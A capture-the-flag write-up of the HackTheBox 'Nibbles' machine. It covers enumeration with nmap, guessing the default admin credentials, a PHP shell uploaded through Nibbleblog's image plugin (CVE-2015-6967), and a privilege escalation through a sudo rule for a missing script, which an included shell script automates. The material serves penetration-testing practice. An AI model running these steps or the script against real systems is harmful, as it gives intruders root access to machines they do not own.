Hack The Box — Nibbles — without Metasploit (TJNull’s list for OSCP)
This is my 2nd write-up for Nibbles, a machine from TJNull’s list of HackTheBox machines for OSCP practice. The full list can be found here.
In a general penetration test or a CTF, there are usually three major phases involved:
- Enumeration and Scanning (Information Gathering).
- Initial Foothold.
- Privilege Escalation.
Let’s get started with the box!
Enumeration
In order to get into a system we first need to gather information about it. We use Nmap to scan the ports of the target machine and find out which services are running, since those services are what we will target.
nmap -sC -sV -A -T4 10.129.229.132
- -sC runs the default NSE scripts to enumerate the discovered services further.
- -sV probes the open ports to identify the service and its version.
- -A enables aggressive scanning (OS detection, version detection, script scanning and traceroute); it is noisy and not usually recommended in a real engagement.
- -T4 selects the "aggressive" timing template, which speeds the scan up by shortening timeouts and raising parallelism; it does not set a thread count.
The quick scan of the default ports shows that ports 22 (SSH) and 80 (HTTP) are open.
Let’s start by enumerating the web server, since SSH rarely gives away anything beyond its version banner.
By visiting the web-server, we can see that there’s nothing much here… Or is there??
If we right-click and view the source of the page, there’s a comment that reveals a directory /nibbleblog/ on the web server. Let’s navigate to that directory and see what we have.
At the bottom right we can see Powered by Nibbleblog, which gives me a hunch that this is an off-the-shelf blogging CMS. To confirm, we can simply Google it.
And I was right: it is indeed a real blog system. That’s useful, because its documentation and default configuration are available online.
Its GitHub page (https://github.com/dignajar/nibbleblog) lists default files and directories that we can request directly on the target while directory busting runs in the background; checking known paths this way is faster than waiting for a wordlist to hit them.
Directory busting reveals a README file in /nibbleblog/.
Going through the README reveals the version of Nibbleblog in use: 4.0.3.
Initial Foothold
Let’s search for an exploit for this version.
By a simple Google search I came across this exploit on GitHub: https://github.com/dix0nym/CVE-2015-6967
CVE-2015-6967 is an unrestricted file upload in Nibbleblog’s My Image plugin: an authenticated admin can upload a file with a .php extension and then request it, so the web server executes it. That is why, judging from the example in its Usage documentation, the exploit needs valid credentials to upload an arbitrary file.
We don’t have credentials yet, so let’s hunt for admin credentials before using the exploit.
Enumerating Nibbleblog’s default files and directories shows that admin.php is the administrative login portal.
Let’s try admin:admin first, since those are common default credentials.
admin:admin doesn’t work. Let’s try admin:nibbles, the pair used in the exploit’s Usage example (and nibbles is also the name of the box).
Lol! xD
(NOTE: I wrote this blog in two different sittings, so the IP of the target machine changed to 10.129.198.95.)
Now let’s try the exploit that we found earlier.
It says Login Successful but Upload likely failed. Hmm… let’s read the exploit code and see how it works.
The exploit targets the My_image plugin to upload the shell. Let’s check whether that plugin is installed.
It is installed. Let’s look at its configuration by clicking Configure.
There’s an upload option here. Let’s use it to upload a PHP reverse shell instead of relying on the script.
The upload produced some PHP warnings but no errors: the plugin tries to handle our file as an image and the resize step complains, but the file is still saved.
Looking at the exploit code again, under execute_function we can see the path the uploaded file is written to.
Let’s check whether image.php now exists in the My_image plugin directory.
Yes it does! Let’s start a listener to catch the reverse shell and then request image.php.
And we have a shell!
Let’s collect the user.txt flag first.
Privilege Escalation
For privilege escalation, let’s check whether the current user can run any commands as root:
sudo -l
The last two lines tell us that the user nibbler can run /home/nibbler/personal/stuff/monitor.sh as root without a password.
Let’s see what we have in this script.
cat /home/nibbler/personal/stuff/monitor.sh
No such file or directory: the script sudo trusts doesn’t exist. The path sits under /home/nibbler, which we own, so we can create it ourselves and sudo will happily run whatever we put there as root.
Let’s create the personal directory inside /home/nibbler, then the stuff directory inside personal.
Let’s create monitor.sh there and put in code that spawns a bash shell.
With monitor.sh ready, let’s make it executable and run it with sudo.
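The whole escalation as one script, added here as an example and not part of the original write-up: it pulls the command paths out of `sudo -l` output, classifies each as existing, missing-but-creatable or missing, and recreates the missing script so the sudo rule hands over a root shell. The `sudo -l` text embedded below is a constructed sample shaped like the output on the box (hostname and Defaults line are assumed); on the target you feed in the real output.

```bash
#!/bin/sh
# Added example (not from the write-up): check what a NOPASSWD sudo rule points
# at, then create the missing script so the rule hands us a root shell.
# SAMPLE_SUDO_L is a constructed stand-in for `sudo -l`; on the target run:
#   sh privesc.sh plant "$(sudo -l)"
SAMPLE_SUDO_L='Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh'

# Print the command path of every NOPASSWD entry, one per line (arguments dropped).
extract_nopasswd_paths() {
    printf '%s\n' "$1" | sed -n 's/.*NOPASSWD: //p' | tr ',' '\n' | sed 's/^ *//; s/ .*//'
}

# Walk up from a path until something exists; that is the directory we would
# have to write in to create the missing script.
first_existing_parent() {
    p=$1
    while [ ! -e "$p" ] && [ "$p" != "/" ]; do
        p=$(dirname "$p")
    done
    echo "$p"
}

# exists / missing-writable / missing. Nibbles is the middle case: monitor.sh is
# gone, but /home/nibbler belongs to us, so we can recreate the whole path.
classify_rule_path() {
    path=$1
    if [ -e "$path" ]; then
        echo exists
    elif [ -w "$(first_existing_parent "$path")" ]; then
        echo missing-writable
    else
        echo missing
    fi
}

# Create the directories and the script sudo expects; the script just starts bash,
# which is root because sudo runs the whole script as root.
plant_monitor_sh() {
    target=$1
    mkdir -p "$(dirname "$target")"
    cat > "$target" <<'EOF'
#!/bin/bash
/bin/bash
EOF
    chmod +x "$target"
    [ -x "$target" ]
}

# Usage on the box: sh privesc.sh plant "$(sudo -l)"
# then: sudo /home/nibbler/personal/stuff/monitor.sh
if [ "${1:-}" = "plant" ]; then
    extract_nopasswd_paths "${2:-$SAMPLE_SUDO_L}" | while read -r rule_path; do
        state=$(classify_rule_path "$rule_path")
        echo "$state $rule_path"
        if [ "$state" = missing-writable ]; then
            plant_monitor_sh "$rule_path"
        fi
    done
fi
```

If the rule had pointed at an existing file owned by root, the classification would come back as `exists` and this trick would not apply; the bug on Nibbles is specifically a sudo entry for a path that does not exist inside a directory the low-privileged user controls.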
And we got root!
Let’s grab the root.txt flag from /root/root.txt.